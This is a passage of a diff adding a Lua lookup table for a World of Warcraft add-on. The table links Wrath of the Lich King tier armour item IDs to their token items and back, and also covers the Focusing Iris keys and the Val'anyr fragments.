40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Mantle of Faith + ["40459"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Valorous Dreamwalker Handguards + ["40460"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Dreamwalker Headpiece + ["40461"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Dreamwalker Leggings + ["40462"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Dreamwalker Robe + ["40463"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Dreamwalker Spaulders + ["40465"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Dreamwalker Gloves + ["40466"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Dreamwalker Cover + ["40467"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Dreamwalker Trousers + ["40468"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Dreamwalker Vestments + ["40469"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Dreamwalker Mantle + ["40470"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Dreamwalker Raiments + ["40471"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Dreamwalker Handgrips + ["40472"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Dreamwalker Headguard + ["40473"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Dreamwalker Legguards + ["40493"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Dreamwalker Shoulderpads + ["40494"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Bonescythe Breastplate + ["40495"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Bonescythe Gauntlets + ["40496"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Bonescythe Helmet + ["40499"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Bonescythe Legplates + ["40500"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Bonescythe Pauldrons + ["40502"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Cryptstalker Tunic + ["40503"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Cryptstalker Handguards + ["40504"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Cryptstalker Headpiece + ["40505"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Cryptstalker Legguards + ["40506"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Cryptstalker Spaulders + ["40507"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Earthshatter Tunic + ["40508"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Earthshatter Handguards + ["40509"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Earthshatter Headpiece + ["40510"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Earthshatter Legguards + ["40512"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Earthshatter Spaulders + ["40513"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Earthshatter Hauberk + ["40514"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Earthshatter Gloves + ["40515"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Earthshatter Helm + ["40516"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Earthshatter Kilt + ["40517"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Earthshatter Shoulderpads + ["40518"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Earthshatter Grips + ["40520"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Earthshatter Faceguard + ["40521"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Earthshatter War-Kilt + ["40522"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Earthshatter Chestguard + ["40523"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Earthshatter Shoulderguards + ["40524"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Dreadnaught Battleplate + ["40525"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Dreadnaught Gauntlets + ["40527"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Dreadnaught Helmet + ["40528"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Dreadnaught Legplates + ["40529"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Dreadnaught Shoulderplates + ["40530"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Dreadnaught Breastplate + ["40544"] = { + 40626, -- Breastplate of the Lost Protector + }, + -- Valorous Dreadnaught Handguards + ["40545"] = { + 40629, -- Gauntlets of the Lost Protector + }, + -- Valorous Dreadnaught Greathelm + ["40546"] = { + 40632, -- Crown of the Lost Protector + }, + -- Valorous Dreadnaught Legguards + ["40547"] = { + 40635, -- Legplates of the Lost Protector + }, + -- Valorous Dreadnaught Pauldrons + ["40548"] = { + 40638, -- Mantle of the Lost Protector + }, + -- Valorous Scourgeborne Battleplate + ["40550"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Scourgeborne Gauntlets + ["40552"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Scourgeborne Helmet + ["40554"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Scourgeborne Legplates + ["40556"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Scourgeborne Shoulderplates + ["40557"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Scourgeborne Chestguard + ["40559"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Scourgeborne Handguards + ["40563"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Scourgeborne Faceguard + ["40565"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Scourgeborne Legguards + ["40567"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Scourgeborne Pauldrons + ["40568"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Redemption Tunic + ["40569"] = { + 40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Redemption Gloves + ["40570"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Redemption Headpiece + ["40571"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Redemption Greaves + ["40572"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Redemption Spaulders + ["40573"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Valorous Redemption Chestpiece + ["40574"] = { + 40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Redemption Gauntlets + ["40575"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Redemption Helm + ["40576"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Redemption Legplates + ["40577"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Redemption Shoulderplates + ["40578"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Valorous Redemption Breastplate + ["40579"] = { + 40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Redemption Handguards + ["40580"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Redemption Faceguard + ["40581"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Redemption Legguards + ["40583"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Redemption Shoulderguards + ["40584"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Chestguard of the Lost Conqueror + ["40610"] = { + 39497, -- Heroes' Plagueheart Robe + 39515, -- Heroes' Robe of Faith + 39523, -- Heroes' Raiments of Faith + 39629, -- Heroes' Redemption Tunic + 39633, -- Heroes' Redemption Chestpiece + 39638, -- Heroes' Redemption Breastplate + }, + -- Chestguard of the Lost Protector + ["40611"] = { + 39579, -- Heroes' Cryptstalker Tunic + 39588, -- Heroes' Earthshatter Tunic + 39592, -- Heroes' Earthshatter Hauberk + 39597, -- Heroes' Earthshatter Chestguard + 39606, -- Heroes' Dreadnaught Battleplate + 39611, -- Heroes' Dreadnaught Breastplate + }, + -- Chestguard of the Lost Vanquisher + ["40612"] = { + 39492, -- Heroes' Frostfire Robe + 39538, -- Heroes' Dreamwalker Robe + 39547, -- Heroes' Dreamwalker Vestments + 39554, -- Heroes' Dreamwalker Raiments + 39558, -- Heroes' Bonescythe Breastplate + 39617, -- Heroes' Scourgeborne Battleplate + 39623, -- Heroes' Scourgeborne Chestguard + }, + -- Gloves of the Lost Conqueror + ["40613"] = { + 39500, -- Heroes' Plagueheart Gloves + 39519, -- Heroes' Gloves of Faith + 39530, -- Heroes' Handwraps of Faith + 39632, -- Heroes' Redemption Gloves + 39634, -- Heroes' Redemption Gauntlets + 39639, -- Heroes' Redemption Handguards + }, + -- Gloves of the Lost Protector + ["40614"] = { + 39582, -- Heroes' Cryptstalker Handguards + 39591, -- Heroes' Earthshatter Handguards + 39593, -- Heroes' Earthshatter Gloves + 39601, -- Heroes' Earthshatter Grips + 39609, -- Heroes' Dreadnaught Gauntlets + 39622, -- Heroes' Dreadnaught Handguards + }, + -- Gloves of the Lost Vanquisher + ["40615"] = { + 39495, -- Heroes' Frostfire Gloves + 39543, -- Heroes' Dreamwalker Handguards + 39544, -- Heroes' Dreamwalker Gloves + 39557, -- Heroes' Dreamwalker Handgrips + 39560, -- Heroes' Bonescythe Gauntlets + 39618, -- Heroes' Scourgeborne Gauntlets + 39624, -- Heroes' Scourgeborne Handguards + }, + -- Helm of the Lost Conqueror + ["40616"] = { + 39496, -- Heroes' Plagueheart Circlet + 39514, -- Heroes' Crown of Faith + 39521, -- Heroes' Circlet of Faith + 39628, -- Heroes' Redemption Headpiece + 39635, -- Heroes' Redemption Helm + 39640, -- Heroes' Redemption Faceguard + }, + -- Helm of the Lost Protector + ["40617"] = { + 39578, -- Heroes' Cryptstalker Headpiece + 39583, -- Heroes' Earthshatter Headpiece + 39594, -- Heroes' Earthshatter Helm + 39602, -- Heroes' Earthshatter Faceguard + 39605, -- Heroes' Dreadnaught Helmet + 39610, -- Heroes' Dreadnaught Greathelm + }, + -- Helm of the Lost Vanquisher + ["40618"] = { + 39491, -- Heroes' Frostfire Circlet + 39531, -- Heroes' Dreamwalker Headpiece + 39545, -- Heroes' Dreamwalker Cover + 39553, -- Heroes' Dreamwalker Headguard + 39561, -- Heroes' Bonescythe Helmet + 39619, -- Heroes' Scourgeborne Helmet + 39625, -- Heroes' Scourgeborne Faceguard + }, + -- Leggings of the Lost Conqueror + ["40619"] = { + 39498, -- Heroes' Plagueheart Leggings + 39517, -- Heroes' Leggings of Faith + 39528, -- Heroes' Pants of Faith + 39630, -- Heroes' Redemption Greaves + 39636, -- Heroes' Redemption Legplates + 39641, -- Heroes' Redemption Legguards + }, + -- Leggings of the Lost Protector + ["40620"] = { + 39580, -- Heroes' Cryptstalker Legguards + 39589, -- Heroes' Earthshatter Legguards + 39595, -- Heroes' Earthshatter Kilt + 39603, -- Heroes' Earthshatter War-Kilt + 39607, -- Heroes' Dreadnaught Legplates + 39612, -- Heroes' Dreadnaught Legguards + }, + -- Leggings of the Lost Vanquisher + ["40621"] = { + 39493, -- Heroes' Frostfire Leggings + 39539, -- Heroes' Dreamwalker Leggings + 39546, -- Heroes' Dreamwalker Trousers + 39555, -- Heroes' Dreamwalker Legguards + 39564, -- Heroes' Bonescythe Legplates + 39620, -- Heroes' Scourgeborne Legplates + 39626, -- Heroes' Scourgeborne Legguards + }, + -- Spaulders of the Lost Conqueror + ["40622"] = { + 39499, -- Heroes' Plagueheart Shoulderpads + 39518, -- Heroes' Shoulderpads of Faith + 39529, -- Heroes' Mantle of Faith + 39631, -- Heroes' Redemption Spaulders + 39637, -- Heroes' Redemption Shoulderplates + 39642, -- Heroes' Redemption Shoulderguards + }, + -- Spaulders of the Lost Protector + ["40623"] = { + 39581, -- Heroes' Cryptstalker Spaulders + 39590, -- Heroes' Earthshatter Spaulders + 39596, -- Heroes' Earthshatter Shoulderpads + 39604, -- Heroes' Earthshatter Shoulderguards + 39608, -- Heroes' Dreadnaught Shoulderplates + 39613, -- Heroes' Dreadnaught Pauldrons + }, + -- Spaulders of the Lost Vanquisher + ["40624"] = { + 39494, -- Heroes' Frostfire Shoulderpads + 39542, -- Heroes' Dreamwalker Spaulders + 39548, -- Heroes' Dreamwalker Mantle + 39556, -- Heroes' Dreamwalker Shoulderpads + 39565, -- Heroes' Bonescythe Pauldrons + 39621, -- Heroes' Scourgeborne Shoulderplates + 39627, -- Heroes' Scourgeborne Pauldrons + }, + -- Breastplate of the Lost Conqueror + ["40625"] = { + 40423, -- Valorous Plagueheart Robe + 40449, -- Valorous Robe of Faith + 40458, -- Valorous Raiments of Faith + 40569, -- Valorous Redemption Tunic + 40574, -- Valorous Redemption Chestpiece + 40579, -- Valorous Redemption Breastplate + }, + -- Breastplate of the Lost Protector + ["40626"] = { + 40503, -- Valorous Cryptstalker Tunic + 40508, -- Valorous Earthshatter Tunic + 40514, -- Valorous Earthshatter Hauberk + 40523, -- Valorous Earthshatter Chestguard + 40525, -- Valorous Dreadnaught Battleplate + 40544, -- Valorous Dreadnaught Breastplate + }, + -- Breastplate of the Lost Vanquisher + ["40627"] = { + 40418, -- Valorous Frostfire Robe + 40463, -- Valorous Dreamwalker Robe + 40469, -- Valorous Dreamwalker Vestments + 40471, -- Valorous Dreamwalker Raiments + 40495, -- Valorous Bonescythe Breastplate + 40550, -- Valorous Scourgeborne Battleplate + 40559, -- Valorous Scourgeborne Chestguard + }, + -- Gauntlets of the Lost Conqueror + ["40628"] = { + 40420, -- Valorous Plagueheart Gloves + 40445, -- Valorous Gloves of Faith + 40454, -- Valorous Handwraps of Faith + 40570, -- Valorous Redemption Gloves + 40575, -- Valorous Redemption Gauntlets + 40580, -- Valorous Redemption Handguards + }, + -- Gauntlets of the Lost Protector + ["40629"] = { + 40504, -- Valorous Cryptstalker Handguards + 40509, -- Valorous Earthshatter Handguards + 40515, -- Valorous Earthshatter Gloves + 40520, -- Valorous Earthshatter Grips + 40527, -- Valorous Dreadnaught Gauntlets + 40545, -- Valorous Dreadnaught Handguards + }, + -- Gauntlets of the Lost Vanquisher + ["40630"] = { + 40415, -- Valorous Frostfire Gloves + 40460, -- Valorous Dreamwalker Handguards + 40466, -- Valorous Dreamwalker Gloves + 40472, -- Valorous Dreamwalker Handgrips + 40496, -- Valorous Bonescythe Gauntlets + 40552, -- Valorous Scourgeborne Gauntlets + 40563, -- Valorous Scourgeborne Handguards + }, + -- Crown of the Lost Conqueror + ["40631"] = { + 40421, -- Valorous Plagueheart Circlet + 40447, -- Valorous Crown of Faith + 40456, -- Valorous Circlet of Faith + 40571, -- Valorous Redemption Headpiece + 40576, -- Valorous Redemption Helm + 40581, -- Valorous Redemption Faceguard + }, + -- Crown of the Lost Protector + ["40632"] = { + 40505, -- Valorous Cryptstalker Headpiece + 40510, -- Valorous Earthshatter Headpiece + 40516, -- Valorous Earthshatter Helm + 40521, -- Valorous Earthshatter Faceguard + 40528, -- Valorous Dreadnaught Helmet + 40546, -- Valorous Dreadnaught Greathelm + }, + -- Crown of the Lost Vanquisher + ["40633"] = { + 40416, -- Valorous Frostfire Circlet + 40461, -- Valorous Dreamwalker Headpiece + 40467, -- Valorous Dreamwalker Cover + 40473, -- Valorous Dreamwalker Headguard + 40499, -- Valorous Bonescythe Helmet + 40554, -- Valorous Scourgeborne Helmet + 40565, -- Valorous Scourgeborne Faceguard + }, + -- Legplates of the Lost Conqueror + ["40634"] = { + 40422, -- Valorous Plagueheart Leggings + 40448, -- Valorous Leggings of Faith + 40457, -- Valorous Pants of Faith + 40572, -- Valorous Redemption Greaves + 40577, -- Valorous Redemption Legplates + 40583, -- Valorous Redemption Legguards + }, + -- Legplates of the Lost Protector + ["40635"] = { + 40506, -- Valorous Cryptstalker Legguards + 40512, -- Valorous Earthshatter Legguards + 40517, -- Valorous Earthshatter Kilt + 40522, -- Valorous Earthshatter War-Kilt + 40529, -- Valorous Dreadnaught Legplates + 40547, -- Valorous Dreadnaught Legguards + }, + -- Legplates of the Lost Vanquisher + ["40636"] = { + 40417, -- Valorous Frostfire Leggings + 40462, -- Valorous Dreamwalker Leggings + 40468, -- Valorous Dreamwalker Trousers + 40493, -- Valorous Dreamwalker Legguards + 40500, -- Valorous Bonescythe Legplates + 40556, -- Valorous Scourgeborne Legplates + 40567, -- Valorous Scourgeborne Legguards + }, + -- Mantle of the Lost Conqueror + ["40637"] = { + 40424, -- Valorous Plagueheart Shoulderpads + 40450, -- Valorous Shoulderpads of Faith + 40459, -- Valorous Mantle of Faith + 40573, -- Valorous Redemption Spaulders + 40578, -- Valorous Redemption Shoulderplates + 40584, -- Valorous Redemption Shoulderguards + }, + -- Mantle of the Lost Protector + ["40638"] = { + 40507, -- Valorous Cryptstalker Spaulders + 40513, -- Valorous Earthshatter Spaulders + 40518, -- Valorous Earthshatter Shoulderpads + 40524, -- Valorous Earthshatter Shoulderguards + 40530, -- Valorous Dreadnaught Shoulderplates + 40548, -- Valorous Dreadnaught Pauldrons + }, + -- Mantle of the Lost Vanquisher + ["40639"] = { + 40419, -- Valorous Frostfire Shoulderpads + 40465, -- Valorous Dreamwalker Spaulders + 40470, -- Valorous Dreamwalker Mantle + 40494, -- Valorous Dreamwalker Shoulderpads + 40502, -- Valorous Bonescythe Pauldrons + 40557, -- Valorous Scourgeborne Shoulderplates + 40568, -- Valorous Scourgeborne Pauldrons + }, + -- Key to the Focusing Iris + ["44569"] = { + 44582, -- Key to the Focusing Iris + 44650, -- Heart of Magic (Normal) + 44657, -- Torque of the Red Dragonflight + 44658, -- Chain of the Ancient Wyrm + 44659, -- Pendant of the Dragonsworn + 44660, -- Drakescale Collar + }, + -- Heroic Key to the Focusing Iris + ["44577"] = { + 44581, -- Heroic Key to the Focusing Iris + 44651, -- Heart of Magic (Heroic) + 44661, -- Wyrmrest Necklace of Power + 44662, -- Life-Binder's Locket + 44664, -- Favor of the Dragon Queen + 44665, -- Nexus War Champion Beads + }, + -- Heroic Key to the Focusing Iris + ["44581"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Key to the Focusing Iris + ["44582"] = { + 44569, -- Key to the Focusing Iris + }, + -- Heart of Magic (Normal) + ["44650"] = { + 44569, -- Key to the Focusing Iris + }, + -- Heart of Magic (Heroic) + ["44651"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Torque of the Red Dragonflight + ["44657"] = { + 44569, -- Key to the Focusing Iris + }, + -- Chain of the Ancient Wyrm + ["44658"] = { + 44569, -- Key to the Focusing Iris + }, + -- Pendant of the Dragonsworn + ["44659"] = { + 44569, -- Key to the Focusing Iris + }, + -- Drakescale Collar + ["44660"] = { + 44569, -- Key to the Focusing Iris + }, + -- Wyrmrest Necklace of Power + ["44661"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Life-Binder's Locket + ["44662"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Favor of the Dragon Queen + ["44664"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Nexus War Champion Beads + ["44665"] = { + 44577, -- Heroic Key to the Focusing Iris + }, + -- Fragment of Val'anyr + ["45038"] = { + 45039, -- Shattered Fragments of Val'anyr + 45896, -- Unbound Fragments of Val'anyr + 45897, -- Reforged Hammer of Ancient Kings + 46017, -- Val'anyr, Hammer of Ancient Kings + }, + -- Shattered Fragments of Val'anyr + ["45039"] = { + 45038, -- Fragment of Val'anyr + }, + -- Runed Orb + ["45087"] = { + 45550, -- Belt of the Titans + 45551, -- Indestructible Plate Girdle + 45552, -- Plate Girdle of Righteousness + 45553, -- Belt of Dragons + 45554, -- Blue Belt of Chaos + 45555, -- Death-warmed Belt + 45556, -- Belt of Arctic Life + 45557, -- Sash of Ancient Power + 45558, -- Cord of the White Dawn + 45559, -- Battlelord's Plate Boots + 45560, -- Spiked Deathdealers + 45561, -- Treads of Destiny + 45562, -- Boots of Living Scale + 45563, -- Lightning Grounded Boots + 45564, -- Footpads of Silence + 45565, -- Boots of Wintry Endurance + 45566, -- Spellslinger's Slippers + 45567, -- Savior's Slippers + }, + -- Valorous Darkruned Chestguard + ["45335"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Darkruned Faceguard + ["45336"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Darkruned Handguards + ["45337"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Darkruned Legguards + ["45338"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Darkruned Pauldrons + ["45339"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Darkruned Battleplate + ["45340"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Darkruned Gauntlets + ["45341"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Darkruned Helmet + ["45342"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Darkruned Legplates + ["45343"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Darkruned Shoulderplates + ["45344"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Nightsong Handguards + ["45345"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Nightsong Headpiece + ["45346"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Nightsong Leggings + ["45347"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Nightsong Robe + ["45348"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Nightsong Spaulders + ["45349"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Nightsong Gloves + ["45351"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Nightsong Mantle + ["45352"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Nightsong Trousers + ["45353"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Nightsong Vestments + ["45354"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Nightsong Handgrips + ["45355"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Nightsong Headguard + ["45356"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Nightsong Legguards + ["45357"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Nightsong Raiments + ["45358"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Nightsong Shoulderpads + ["45359"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Scourgestalker Handguards + ["45360"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Scourgestalker Headpiece + ["45361"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Scourgestalker Legguards + ["45362"] = { + 45651, -- Leggings of the Wayward Protector + }, + -- Valorous Scourgestalker Spaulders + ["45363"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Valorous Scourgestalker Tunic + ["45364"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Kirin Tor Hood + ["45365"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Kirin Tor Leggings + ["45367"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Kirin Tor Tunic + ["45368"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Kirin Tor Shoulderpads + ["45369"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Aegis Gloves + ["45370"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Aegis Greaves + ["45371"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Aegis Headpiece + ["45372"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Aegis Spaulders + ["45373"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Aegis Tunic + ["45374"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Aegis Battleplate + ["45375"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Aegis Gauntlets + ["45376"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Aegis Helm + ["45377"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Aegis Legplates + ["45379"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Aegis Shoulderplates + ["45380"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Aegis Breastplate + ["45381"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Aegis Faceguard + ["45382"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Aegis Handguards + ["45383"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Aegis Legguards + ["45384"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Aegis Shoulderguards + ["45385"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Cowl of Sanctification + ["45386"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Gloves of Sanctification + ["45387"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Leggings of Sanctification + ["45388"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Robe of Sanctification + ["45389"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Shoulderpads of Sanctification + ["45390"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Circlet of Sanctification + ["45391"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Handwraps of Sanctification + ["45392"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Mantle of Sanctification + ["45393"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Pants of Sanctification + ["45394"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Raiments of Sanctification + ["45395"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Terrorblade Breastplate + ["45396"] = { + 45637, -- Chestguard of the Wayward Vanquisher + }, + -- Valorous Terrorblade Gauntlets + ["45397"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Valorous Terrorblade Helmet + ["45398"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Valorous Terrorblade Legplates + ["45399"] = { + 45652, -- Leggings of the Wayward Vanquisher + }, + -- Valorous Terrorblade Pauldrons + ["45400"] = { + 45661, -- Spaulders of the Wayward Vanquisher + }, + -- Valorous Worldbreaker Handguards + ["45401"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Worldbreaker Headpiece + ["45402"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Worldbreaker Legguards + ["45403"] = { + 45651, -- Leggings of the Wayward Protector + }, + -- Valorous Worldbreaker Spaulders + ["45404"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Valorous Worldbreaker Tunic + ["45405"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Worldbreaker Gloves + ["45406"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Worldbreaker Helm + ["45408"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Worldbreaker Kilt + ["45409"] = { + 45651, -- Leggings of the Wayward Protector + }, + -- Valorous Worldbreaker Shoulderpads + ["45410"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Valorous Worldbreaker Hauberk + ["45411"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Worldbreaker Faceguard + ["45412"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Worldbreaker Chestguard + ["45413"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Worldbreaker Grips + ["45414"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Worldbreaker Shoulderguards + ["45415"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Valorous Worldbreaker War-Kilt + ["45416"] = { + 45651, -- Leggings of the Wayward Protector + }, + -- Valorous Deathbringer Hood + ["45417"] = { + 45647, -- Helm of the Wayward Conqueror + }, + -- Valorous Deathbringer Gloves + ["45419"] = { + 45644, -- Gloves of the Wayward Conqueror + }, + -- Valorous Deathbringer Leggings + ["45420"] = { + 45650, -- Leggings of the Wayward Conqueror + }, + -- Valorous Deathbringer Robe + ["45421"] = { + 45635, -- Chestguard of the Wayward Conqueror + }, + -- Valorous Deathbringer Shoulderpads + ["45422"] = { + 45659, -- Spaulders of the Wayward Conqueror + }, + -- Valorous Siegebreaker Breastplate + ["45424"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Siegebreaker Greathelm + ["45425"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Siegebreaker Handguards + ["45426"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Siegebreaker Legguards + ["45427"] = { + 45651, -- Leggings of the Wayward Protector + }, + -- Valorous Siegebreaker Pauldrons + ["45428"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Valorous Siegebreaker Battleplate + ["45429"] = { + 45636, -- Chestguard of the Wayward Protector + }, + -- Valorous Siegebreaker Gauntlets + ["45430"] = { + 45645, -- Gloves of the Wayward Protector + }, + -- Valorous Siegebreaker Helmet + ["45431"] = { + 45648, -- Helm of the Wayward Protector + }, + -- Valorous Siegebreaker Legplates + ["45432"] = { + 45651, -- Leggings of the Wayward Protector + }, + 